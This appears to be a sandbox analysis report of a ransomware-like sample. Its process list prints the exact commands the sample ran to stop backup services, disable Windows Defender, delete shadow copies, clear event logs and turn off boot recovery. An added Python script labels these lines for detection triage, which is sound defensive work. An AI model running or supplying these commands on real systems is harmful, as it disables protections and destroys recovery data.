Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1668 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1548 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1548 wrote to memory of 648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1548 wrote to memory of 648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1548 wrote to memory of 648 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1328 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1328 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1328 wrote to memory of 1632 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1380 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1380 wrote to memory of 1072 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1380 wrote to memory of 1072 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1380 wrote to memory of 1072 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 664 wrote to memory of 1332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 664 wrote to memory of 1332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 664 wrote to memory of 1332 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 452 wrote to memory of 752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 452 wrote to memory of 752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 452 wrote to memory of 752 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 956 wrote to memory of 1092 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 956 wrote to memory of 1092 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 956 wrote to memory of 1092 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1052 wrote to memory of 1488 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1052 wrote to memory of 1488 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1052 wrote to memory of 1488 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1668 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\net.exe
PID 1100 wrote to memory of 1532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1100 wrote to memory of 1532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1100 wrote to memory of 1532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1668 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe
PID 1668 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true
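
The process list above is a complete pre-encryption defense-evasion chain: backup and VSS-related services are stopped and disabled, Defender is switched off through policy keys, service Start values, scheduled tasks, autorun entries and Set-MpPreference, its definitions are removed, shadow copies are deleted, the System, Security and Application logs are cleared, and boot recovery is disabled. The following added example, not part of the sandbox report, labels each command line against a small rule set so the raw process list can be rolled up into behaviours and the analyst can see which lines no rule explains. The sample input is a subset of the command lines copied from this section; the rule labels are this example's own names, not the sandbox's signature names, and the patterns key on the exact syntax seen here.

```python
"""Label the command lines of this detonation against a small rule set.

Added example, not part of the sandbox report.  Labels are this example's
own names; the sample input is a subset of the command lines listed above.
"""
import re
from collections import Counter

# Constructed sample: command lines copied from the Processes list above.
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\08b030adcb0526e36a815bc87e56b71f41f865837594d8a277ab6fe92c850402.bin.sample.exe"',
    r'net.exe stop "VSS" /y',
    r'C:\Windows\system32\net1 stop "VSS" /y',
    r'net.exe stop "wbengine" /y',
    r'sc.exe config "VSS" start= disabled',
    r'sc.exe config "SDRSVC" start= disabled',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f',
    r'reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wevtutil.exe cl security',
    r'wmic.exe SHADOWCOPY /nointeractive',
    r'wmic.exe shadowcopy delete',
    r'bcdedit.exe /set {default} recoveryenabled no',
    r'cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
]

DEFENDER_POLICY = re.escape(r"HKLM\Software\Policies\Microsoft\Windows Defender")

# (label, pattern).  Rules that capture a service name expose it as group 'svc'.
RULES = [
    ("stops service (net stop)", re.compile(r'\bnet1?(?:\.exe)?\s+stop\s+"?(?P<svc>[^"\s]+)"?', re.I)),
    ("disables service start (sc config)", re.compile(r'\bsc(?:\.exe)?\s+config\s+"?(?P<svc>[^"\s]+)"?\s+start=\s*disabled', re.I)),
    ("tampers Defender policy keys", re.compile(r'\breg(?:\.exe)?\s+(?:add|delete)\s+"' + DEFENDER_POLICY, re.I)),
    ("disables Defender services/drivers (Start=4)", re.compile(r'\\Services\\(?:WdBoot|WdFilter|WdNisDrv|WdNisSvc|WinDefend|SecurityHealthService)"\s+/v\s+"Start"\s+/t\s+REG_DWORD\s+/d\s+"4"', re.I)),
    ("disables Defender ETW autologger", re.compile(r'\\WMI\\Autologger\\Defender\w+"\s+/v\s+"Start"\s+/t\s+REG_DWORD\s+/d\s+"0"', re.I)),
    ("disables Defender scheduled task", re.compile(r'\bschtasks(?:\.exe)?\s+/Change\s+/TN\s+"Microsoft\\Windows\\(?:Windows Defender|ExploitGuard)[^"]*"\s+/Disable', re.I)),
    ("removes Defender Run entry", re.compile(r'\breg(?:\.exe)?\s+delete\s+"HK(?:LM|CU)\\Software\\Microsoft\\Windows\\CurrentVersion\\(?:Explorer\\StartupApproved\\)?Run"\s+/v\s+"Windows ?Defender"', re.I)),
    ("removes Defender shell extension (EPP)", re.compile(r'\\shellex\\ContextMenuHandlers\\EPP"', re.I)),
    ("deletes shadow copies", re.compile(r'\bvssadmin(?:\.exe)?\s+delete\s+shadows|\bwmic(?:\.exe)?\s+shadowcopy\s+delete', re.I)),
    ("queries shadow copies (wmic)", re.compile(r'\bwmic(?:\.exe)?\s+shadowcopy\b(?!\s+delete)', re.I)),
    ("clears event log", re.compile(r'\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+\S+', re.I)),
    ("disables boot recovery (bcdedit)", re.compile(r'\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)', re.I)),
    ("removes Defender definitions", re.compile(r'MpCmdRun(?:\.exe)?"?\s+-RemoveDefinitions', re.I)),
    ("disables Defender via Set-MpPreference", re.compile(r'Set-MpPreference\s+-Disable\w+\s+\$true', re.I)),
]


def classify(cmdline):
    """Labels of every rule the command line matches (empty list = unmatched)."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def services_targeted(cmdlines):
    """Service names hit by 'net stop' or 'sc config ... start= disabled'."""
    names = set()
    for cmd in cmdlines:
        for _label, rx in RULES:
            m = rx.search(cmd)
            if m and "svc" in rx.groupindex:
                names.add(m.group("svc"))
    return names


def triage(cmdlines):
    """Return (Counter of labels, command lines that no rule matched)."""
    hits, unmatched = Counter(), []
    for cmd in cmdlines:
        labels = classify(cmd)
        if labels:
            hits.update(labels)
        else:
            unmatched.append(cmd)
    return hits, unmatched


if __name__ == "__main__":
    hits, unmatched = triage(SAMPLE_CMDLINES)
    for label, n in hits.most_common():
        print(f"{n:3d}  {label}")
    print("services stopped/disabled:", sorted(services_targeted(SAMPLE_CMDLINES)))
    print("unmatched:", unmatched)
```

The same rules can be pointed at the CommandLine field of Sysmon Event ID 1 or Security 4688 records. Two things to keep in mind when reading the counts: net.exe hands off to net1.exe, so every net stop appears twice in the process list and is counted twice here, and the cmd.exe /c wrapper and the child it launches (MpCmdRun.exe, powershell.exe) both carry the same command text, so those stages are double counted as well. The unmatched list is the more important output: anything left there either needs a rule or is benign, and only a human can say which.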

Network

N/A

Files

memory/1548-55-0x0000000000000000-mapping.dmp

memory/648-56-0x0000000000000000-mapping.dmp

memory/1328-57-0x0000000000000000-mapping.dmp

memory/1632-58-0x0000000000000000-mapping.dmp

memory/1380-59-0x0000000000000000-mapping.dmp

memory/1072-60-0x0000000000000000-mapping.dmp

memory/664-61-0x0000000000000000-mapping.dmp

memory/1332-62-0x0000000000000000-mapping.dmp

memory/452-63-0x0000000000000000-mapping.dmp

memory/752-64-0x0000000000000000-mapping.dmp

memory/956-65-0x0000000000000000-mapping.dmp

memory/1092-66-0x0000000000000000-mapping.dmp

memory/1052-67-0x0000000000000000-mapping.dmp

memory/1488-68-0x0000000000000000-mapping.dmp

memory/1100-69-0x0000000000000000-mapping.dmp

memory/1532-70-0x0000000000000000-mapping.dmp

memory/1660-71-0x0000000000000000-mapping.dmp

